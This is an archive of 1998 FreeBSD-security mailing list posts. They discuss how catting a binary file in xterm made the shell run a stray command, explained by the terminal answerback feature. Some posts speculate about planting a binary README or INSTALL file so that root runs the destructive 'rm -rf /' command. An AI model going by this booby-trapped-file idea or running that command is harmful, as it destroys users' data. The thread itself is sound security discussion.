Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA02924 for ; Thu, 10 Sep 1998 07:26:20 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk)
Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id PAA01105 for ; Thu, 10 Sep 1998 15:26:08 +0100 (BST)
Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id PAA01854 for ; Thu, 10 Sep 1998 15:26:06 +0100 (BST) (envelope-from netadmin@fastnet.co.uk)
Date: Thu, 10 Sep 1998 15:26:06 +0100 (BST)
From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: <35F7C4A7.12C2A1C7@kew.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | > Was just having a look in /var/log the other day and spotted | > a file called sendmail.st, wondering what it was I cat'd it | > and here's what it did: | | Quote without comment ... Maybe I shouldn't have said that I wondered what sendmail.st was - I figured out what it did so you can all stop posting me messages telling me now :) Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 08:04:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA09316 for freebsd-security-outgoing; Thu, 10 Sep 1998 08:04:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA09291; Thu, 10 Sep 1998 08:04:34 -0700 (PDT) (envelope-from mike@seidata.com) Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id LAA21899; Thu, 10 Sep 1998 11:06:56 -0400 (EDT) Date: Thu, 10 Sep 1998 11:06:55 -0400 (EDT) 
From: Mike To: Enkhyl cc: Mike Smith , security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 9 Sep 1998, Enkhyl wrote: > I'll see if I can manage to get a mailing list together to organize the > effort and divide up the work (anyone have a server I can host the list > on? :-) Sure... I don't suppose the FreeBSD Project objects in any way to having project-related lists/etc. hosted elsewhere (or maybe -security would be appropriate for this?)? If not (and if you don't get any more attractive offers), I could provide list services. > Anyone that is casually working on this, please speak up so that we can > "projectize" this. Also, this is an area of high-interest for me, so if I lurk enough on a related list, perhaps I can pick up enough info to actually be somewhat helpful. :) -mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 08:10:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA10907 for freebsd-security-outgoing; Thu, 10 Sep 1998 08:10:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA10898 for ; Thu, 10 Sep 1998 08:10:36 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id LAA08830; Thu, 10 Sep 1998 11:10:22 -0400 (EDT) (envelope-from wollman) Date: Thu, 10 Sep 1998 11:10:22 -0400 (EDT) 
From: Garrett Wollman
Message-Id: <199809101510.LAA08830@khavrinen.lcs.mit.edu>
To: Josef Karthauser
Cc: Jay Tribick, freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
In-Reply-To: <19980910144324.B831@pavilion.net>
References: <19980910144324.B831@pavilion.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

< said:

>> bofh$ cat sendmail.st
>> `ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm
>> su: xtermxterm: command not found
>> bofh$

> I've noticed this also. Catting some binaries (by accident of course)
> seems to interact with the terminal badly!! This is on an 'rxvt' running
> bash.

That's why you should normally use `more' or `less'.

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA | - Susan Aglukark and Chad Irschick

From owner-freebsd-security Thu Sep 10 08:19:49 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA13606 for freebsd-security-outgoing; Thu, 10 Sep 1998 08:19:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from brooklyn.slack.net (brooklyn.slack.net [206.41.21.102]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA13565; Thu, 10 Sep 1998 08:19:41 -0700 (PDT) (envelope-from andrewr@brooklyn.slack.net)
Received: from localhost (andrewr@localhost) by brooklyn.slack.net (8.8.7/8.8.7) with SMTP id LAA16903; Thu, 10 Sep 1998 11:20:10 -0400 (EDT)
Date: Thu, 10 Sep 1998 11:20:10 -0400 (EDT)
From: andrewr
To: Enkhyl
cc: security@FreeBSD.ORG, current@FreeBSD.ORG
Subject: Re: FreeBSD Hardening
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 9 Sep 1998, Enkhyl wrote:

> Back when the popper buffer overflow bug sprang forth it was suggested
> that it might be a good idea to go through the OpenBSD change logs and
> evaluate security-related fixes for inclusion in FreeBSD. Is there anyone
> actively working on this? If there is a project organized around this, I'm
> willing to help out with the endeavor. Otherwise, I'm willing to embark on
> this endeavor and make a project out of it.

This kind of died due to lack of interest. As I was told by jkh, if one is
interested enough in this, just start up a mailing list (not from
FreeBSD.org) and a team of workers and get to it. Soon, if all goes well,
it would be incorporated into the actual project.

Good luck.

Andrew

>
> Comments?
>
> --
> Christopher Nielsen
> Scient: The Art and Science of Electronic Business
> cnielsen@scient.com
>

From owner-freebsd-security Thu Sep 10 08:58:10 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA22544 for freebsd-security-outgoing; Thu, 10 Sep 1998 08:58:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from florence.pavilion.net (florence.pavilion.net [194.242.128.25]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA22370 for ; Thu, 10 Sep 1998 08:58:01 -0700 (PDT) (envelope-from joe@florence.pavilion.net)
Received: (from joe@localhost) by florence.pavilion.net (8.8.8/8.8.8) id QAA05258; Thu, 10 Sep 1998 16:57:26 +0100 (BST) (envelope-from joe)
Message-ID: <19980910165725.N831@pavilion.net>
Date: Thu, 10 Sep 1998 16:57:25 +0100
From: Josef Karthauser
To: Garrett Wollman
Cc: Jay Tribick, freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
Mail-Followup-To: Garrett Wollman, Jay Tribick, freebsd-security@FreeBSD.ORG
References: <19980910144324.B831@pavilion.net> <199809101510.LAA08830@khavrinen.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <199809101510.LAA08830@khavrinen.lcs.mit.edu>; from Garrett Wollman on Thu, Sep 10, 1998 at 11:10:22AM -0400
X-NCC-RegID: uk.pavilion
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 10, 1998 at 11:10:22AM -0400, Garrett Wollman wrote:
> < said:
>
> > I've noticed this also. Catting some binaries (by accident of course)
> > seems to interact with the terminal badly!! This is on an 'rxvt' running
> > bash.
>
> That's why you should normally use `more' or `less'.
>

Ok, but how come the interactions we describe?

Joe

--
Josef Karthauser                                        Technical Manager
FreeBSD: The power to serve (http://www.uk.freebsd.org)  Pavilion Internet plc.
[joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk]

From owner-freebsd-security Thu Sep 10 09:10:43 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA25917 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:10:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from phluffy.lm.com (phluffy.lm.com [204.171.44.47]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA25898 for ; Thu, 10 Sep 1998 09:10:37 -0700 (PDT) (envelope-from myke@ees.com)
Received: from localhost (myke@localhost) by phluffy.lm.com (8.9.0/8.8.8) with ESMTP id MAA18131; Thu, 10 Sep 1998 12:10:13 -0400 (EDT) (envelope-from myke@ees.com)
Date: Thu, 10 Sep 1998 12:10:13 -0400 (EDT)
From: Mike Holling
X-Sender: myke@phluffy.lm.com
To: Jay Tribick
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Was just having a look in /var/log the other day and spotted
> a file called sendmail.st, wondering what it was I cat'd it
> and here's what it did:

This file is used by sendmail to keep traffic statistics for each mailer.
man mailstats. You should never cat arbitrary files, at least use 'less'
or some other filter.

- Mike

From owner-freebsd-security Thu Sep 10 09:15:10 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA26887 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:15:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from relay.acadiau.ca (relay.acadiau.ca [131.162.2.90]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA26882 for ; Thu, 10 Sep 1998 09:15:08 -0700 (PDT) (envelope-from 026809r@dragon.acadiau.ca)
Received: from dragon.acadiau.ca (dragon [131.162.1.79]) by relay.acadiau.ca (8.8.5/8.8.5) with SMTP id NAA03411 for ; Thu, 10 Sep 1998 13:14:55 -0300 (ADT)
Received: by dragon.acadiau.ca id NAA07518; Thu, 10 Sep 1998 13:14:53 -0300
From: 026809r@dragon.acadiau.ca (Michael Richards)
Message-Id: <199809101614.NAA07518@dragon.acadiau.ca>
Subject: cat exploit
To: security@FreeBSD.ORG
Date: Thu, 10 Sep 1998 13:14:53 -0300 (ADT)
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi.

Is it just me or did everyone miss the point of Jay's message?

What would happen if I created a file called README that was binary. Since
Jay accidentally had the cat'd sendmail.st execute the command "xtermxterm"
then wouldn't it be possible to create a file (like the README) the people
would be tricked into catting that would run commands as them?

Consider running the rm command. Hell, stick it in a temp dir and make a
shell script called xtermxterm and I believe catting the file will run the
script.

-Mike

From owner-freebsd-security Thu Sep 10 09:22:37 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA28027 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:22:37 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA28022 for ; Thu, 10 Sep 1998 09:22:31 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id MAA09014; Thu, 10 Sep 1998 12:22:09 -0400 (EDT) (envelope-from wollman)
Date: Thu, 10 Sep 1998 12:22:09 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199809101622.MAA09014@khavrinen.lcs.mit.edu>
To: Josef Karthauser
Cc: Garrett Wollman, Jay Tribick, freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
In-Reply-To: <19980910165725.N831@pavilion.net>
References: <19980910144324.B831@pavilion.net> <199809101510.LAA08830@khavrinen.lcs.mit.edu> <19980910165725.N831@pavilion.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

< said:

>> That's why you should normally use `more' or `less'.

> Ok, but how come the interactions we describe?

Most terminals, including the VT102 emulated by `xterm', include some
mechanism for generating an ``answerback'' upon receipt of a special
control code or sequence. (In xterm's case, that happens to be a
control-E.) A binary file is likely enough to contain such a code.

There might be a preference you can set which will disable this
feature in xterm, but I don't know what it might be (and if there is
one, it's not documented).

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA | - Susan Aglukark and Chad Irschick

From owner-freebsd-security Thu Sep 10 09:25:04 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA28495 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:25:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ocean.campus.luth.se (ocean.campus.luth.se [130.240.194.116]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA28485 for ; Thu, 10 Sep 1998 09:25:00 -0700 (PDT) (envelope-from karpen@ocean.campus.luth.se)
Received: (from karpen@localhost) by ocean.campus.luth.se (8.9.1/8.9.1) id SAA10499; Thu, 10 Sep 1998 18:18:41 +0200 (CEST) (envelope-from karpen)
From: Mikael Karpberg
Message-Id: <199809101618.SAA10499@ocean.campus.luth.se>
Subject: Re: Err.. cat exploit.. (!)
In-Reply-To: from Jay Tribick at "Sep 10, 98 12:07:05 pm"
To: netadmin@fastnet.co.uk (Jay Tribick)
Date: Thu, 10 Sep 1998 18:18:41 +0200 (CEST)
Cc: freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL32 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

According to Jay Tribick:
> bofh$ cat sendmail.st
> `ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm
> su: xtermxterm: command not found
> bofh$
>
> This seems quite scary to me, couldn't someone embed 'rm -rf /'
> within a text file and then, if root cats the file it nukes
> their system?

I'm not completely clear on what that is, but I've seen it also. What I
_am_ completely clear about is that it's got nothing to do with cat, and
instead everything to do with xterm. I guess it's some code sequence that
comes up that makes xterm do something. Kinda like the code that sets the
xterm title.

/Mikael

From owner-freebsd-security Thu Sep 10 09:36:09 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA29827 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:36:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA29809; Thu, 10 Sep 1998 09:36:06 -0700 (PDT) (envelope-from jkh@time.cdrom.com)
Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id JAA17155; Thu, 10 Sep 1998 09:35:40 -0700 (PDT) (envelope-from jkh@time.cdrom.com)
To: Mike
cc: Enkhyl, Mike Smith, security@FreeBSD.ORG, current@FreeBSD.ORG
Subject: Re: FreeBSD Hardening
In-reply-to: Your message of "Thu, 10 Sep 1998 11:06:55 EDT."
Date: Thu, 10 Sep 1998 09:35:40 -0700
Message-ID: <17151.905445340@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Sure... I don't suppose the FreeBSD Project objects in any way to
> having project-related lists/etc. hosted elsewhere (or maybe
> -security would be appropriate for this?)? If not (and if you don't

Not at all - in fact, it's less work for us. :-)

- Jordan

From owner-freebsd-security Thu Sep 10 09:44:53 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA02116 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:44:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from phoenix.volant.org (phoenix.volant.org [205.179.79.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA02044 for ; Thu, 10 Sep 1998 09:44:51 -0700 (PDT) (envelope-from patl@phoenix.volant.org)
From: patl@phoenix.volant.org
Received: from asimov.phoenix.volant.org ([205.179.79.65]) by phoenix.volant.org with smtp (Exim 1.92 #8) id 0zH9pq-0003Ph-00; Thu, 10 Sep 1998 09:44:42 -0700
Received: from localhost by asimov.phoenix.volant.org (SMI-8.6/SMI-SVR4) id JAA25278; Thu, 10 Sep 1998 09:44:38 -0700
Date: Thu, 10 Sep 1998 09:44:38 -0700 (PDT)
Reply-To: patl@phoenix.volant.org
Subject: Re: Err.. cat exploit.. (!)
To: Jay Tribick
cc: freebsd-security@FreeBSD.ORG
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> It's not the fact that it was a binary that puzzled me but that
> it had managed to execute a command on the shell just by me
> cat'ing the file. Forgot to mention that it was in an xterm
> and doesn't affect Virtual Consoles.

It's primarily a matter of which escape and other control sequences the
terminal (emulator) recognizes; although, I believe you can also get
different results based on different terminal (stty) settings. A
particularly fun one occurs when you have XON/XOFF enabled and the file
contains a bunch of 0x13s.

You can also irritate your whole office by cat'ing a file with a few
thousand 0x07 (BEL) chars. (Usually, they will be buffered up so that
even quickly killing the cat won't stop the noise for a while. Or at
least I think that is what happened...)

-Pat

From owner-freebsd-security Thu Sep 10 09:58:35 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA04454 for freebsd-security-outgoing; Thu, 10 Sep 1998 09:58:35 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA04449 for ; Thu, 10 Sep 1998 09:58:32 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk)
Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id RAA10442 for ; Thu, 10 Sep 1998 17:58:18 +0100 (BST)
Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id RAA02522 for ; Thu, 10 Sep 1998 17:58:16 +0100 (BST) (envelope-from netadmin@fastnet.co.uk)
Date: Thu, 10 Sep 1998 17:58:16 +0100 (BST)
From: Jay Tribick
X-Sender: netadmin@bofh.fast.net.uk
To: security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To: <199809101614.NAA07518@dragon.acadiau.ca>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

(Finally!)

| Is it just me or did everyone miss the point of Jay's message?

:)

| What would happen if I created a file called README that was binary. Since
| Jay accidentally had the cat'd sendmail.st execute the command "xtermxterm"
| then wouldn't it be possible to create a file (like the README) the people
| would be tricked into catting that would run commands as them?

| Consider running the rm command. Hell, stick it in a temp dir and make a
| shell script called xtermxterm and I believe catting the file will run the
| script.

That's exactly what I was saying - just for example, say you're installing
something as root you usually cat the file INSTALL to find out what
you need to do - it would be relatively simple to embed a command
in there to just rm -rf / & your hd!

Regards,

Jay Tribick

--
[| Network Admin | FastNet International | http://fast.net.uk/ |]
[| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |]
[| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |]

From owner-freebsd-security Thu Sep 10 10:22:54 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA09438 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:22:54 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from florence.pavilion.net (florence.pavilion.net [194.242.128.25]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA09427 for ; Thu, 10 Sep 1998 10:22:40 -0700 (PDT) (envelope-from joe@florence.pavilion.net)
Received: (from joe@localhost) by florence.pavilion.net (8.8.8/8.8.8) id SAA19202; Thu, 10 Sep 1998 18:22:19 +0100 (BST) (envelope-from joe)
Message-ID: <19980910182219.O831@pavilion.net>
Date: Thu, 10 Sep 1998 18:22:19 +0100
From: Josef Karthauser
To: Garrett Wollman
Cc: Jay Tribick, freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
Mail-Followup-To: Garrett Wollman, Jay Tribick, freebsd-security@FreeBSD.ORG
References: <19980910144324.B831@pavilion.net> <199809101510.LAA08830@khavrinen.lcs.mit.edu> <19980910165725.N831@pavilion.net> <199809101622.MAA09014@khavrinen.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <199809101622.MAA09014@khavrinen.lcs.mit.edu>; from Garrett Wollman on Thu, Sep 10, 1998 at 12:22:09PM -0400
X-NCC-RegID: uk.pavilion
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 10, 1998 at 12:22:09PM -0400, Garrett Wollman wrote:
> Most terminals, including the VT102 emulated by `xterm', include some
> mechanism for generating an ``answerback'' upon receipt of a special
> control code or sequence. (In xterm's case, that happens to be a
> control-E.) A binary file is likely enough to contain such a code.
>
> There might be a preference you can set which will disable this
> feature in xterm, but I don't know what it might be (and if there is
> one, it's not documented).

Ahh that explains it.

Ta,
Joe

--
Josef Karthauser                                        Technical Manager
FreeBSD: The power to serve (http://www.uk.freebsd.org)  Pavilion Internet plc.
[joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk]

From owner-freebsd-security Thu Sep 10 10:44:24 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA13668 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:44:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA13662 for ; Thu, 10 Sep 1998 10:44:22 -0700 (PDT) (envelope-from benedict@echonyc.com)
Received: from localhost by echonyc.com (8.9.1/8.9.1) with SMTP id NAA21297; Thu, 10 Sep 1998 13:44:03 -0400 (EDT)
Date: Thu, 10 Sep 1998 13:44:03 -0400 (EDT)
From: Snob Art Genre
Reply-To: ben@rosengart.com
To: Jay Tribick
cc: security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 10 Sep 1998, Jay Tribick wrote:

> That's exactly what I was saying - just for example, say you're installing
> something as root you usually cat the file INSTALL to find out what
> you need to do - it would be relatively simple to embed a command
> in there to just rm -rf / & your hd!

1) No, you use less.

2) So you've figured out how to execute arbitrary commands from this? I'm
not saying that's not possible, but so far the only thing this "bug" does
is output the name of xterm.

Ben

"You have your mind on computers, it seems."

From owner-freebsd-security Thu Sep 10 10:46:20 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA14135 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:46:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from jerusalem.jpl.nasa.gov (aig.jpl.nasa.gov [137.78.90.200]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA14122 for ; Thu, 10 Sep 1998 10:46:16 -0700 (PDT) (envelope-from mutz@pompeii.jpl.nasa.gov)
Received: from pompeii.jpl.nasa.gov (pompeii [137.78.90.38]) by jerusalem.jpl.nasa.gov (8.8.8/8.8.8) with ESMTP id KAA02169 for ; Thu, 10 Sep 1998 10:46:07 -0700 (PDT)
Received: from pompeii (localhost [127.0.0.1]) by pompeii.jpl.nasa.gov (8.8.8/8.8.8) with ESMTP id KAA15836 for ; Thu, 10 Sep 1998 10:46:07 -0700 (PDT)
Message-Id: <199809101746.KAA15836@pompeii.jpl.nasa.gov>
To: freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
In-reply-to: Your message of "Thu, 10 Sep 1998 11:10:22 EDT." <199809101510.LAA08830@khavrinen.lcs.mit.edu>
Date: Thu, 10 Sep 1998 10:46:07 -0700
From: Darren Mutz
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>< said:
>
>>> bofh$ cat sendmail.st
>>> `ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm
>>> su: xtermxterm: command not found
>>> bofh$
>
>> I've noticed this also. Catting some binaries (by accident of course)
>> seems to interact with the terminal badly!! This is on an 'rxvt' running
>> bash.
>
>That's why you should normally use `more' or `less'.

IMHO, that's not the real fix here -- what's potentially of more interest
is the fact that writing some sequence of characters to rxvt can confuse
it to the extent that it will execute another string you write to it.
This problem seems to imply that anyone with write access to your
terminal can execute commands as you.

--
Darren Mutz
darren.mutz@jpl.nasa.gov
My opinions, not JPL's.

From owner-freebsd-security Thu Sep 10 10:48:33 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA14685 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:48:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA14670 for ; Thu, 10 Sep 1998 10:48:31 -0700 (PDT) (envelope-from jkh@time.cdrom.com)
Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id KAA17578; Thu, 10 Sep 1998 10:45:50 -0700 (PDT) (envelope-from jkh@time.cdrom.com)
To: 026809r@dragon.acadiau.ca (Michael Richards)
cc: security@FreeBSD.ORG
Subject: Re: cat exploit
In-reply-to: Your message of "Thu, 10 Sep 1998 13:14:53 -0300." <199809101614.NAA07518@dragon.acadiau.ca>
Date: Thu, 10 Sep 1998 10:45:50 -0700
Message-ID: <17574.905449550@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Is it just me or did everyone miss the point of Jay's message?

The problem is that Jay's message didn't actually have a point. :)
Rather, it described a symptom common to most VT100 compliant terminal
emulators and something very clearly under the "well don't DO that then"
category. It's nothing new at all and if you're not sure of the contents
of a file, don't just blindly cat it to your screen. The same goes for
any binary I might hand you - if I put up a file on an FTP site called
``megaspacewar.exe'' and you go and run it on your Windows box and it
trojans you to death (or worse), whose fault is that? :-) Same basic
issue.

- Jordan

From owner-freebsd-security Thu Sep 10 10:53:41 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA15852 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:53:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA15843 for ; Thu, 10 Sep 1998 10:53:38 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.1/8.8.5) with ESMTP id TAA04714; Thu, 10 Sep 1998 19:46:11 +0200 (CEST)
To: 026809r@dragon.acadiau.ca (Michael Richards)
cc: security@FreeBSD.ORG
Subject: Re: cat exploit
In-reply-to: Your message of "Thu, 10 Sep 1998 13:14:53 -0300." <199809101614.NAA07518@dragon.acadiau.ca>
Date: Thu, 10 Sep 1998 19:46:10 +0200
Message-ID: <4712.905449570@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <199809101614.NAA07518@dragon.acadiau.ca>, Michael Richards writes:
>Hi.
>
>Is it just me or did everyone miss the point of Jay's message?
>
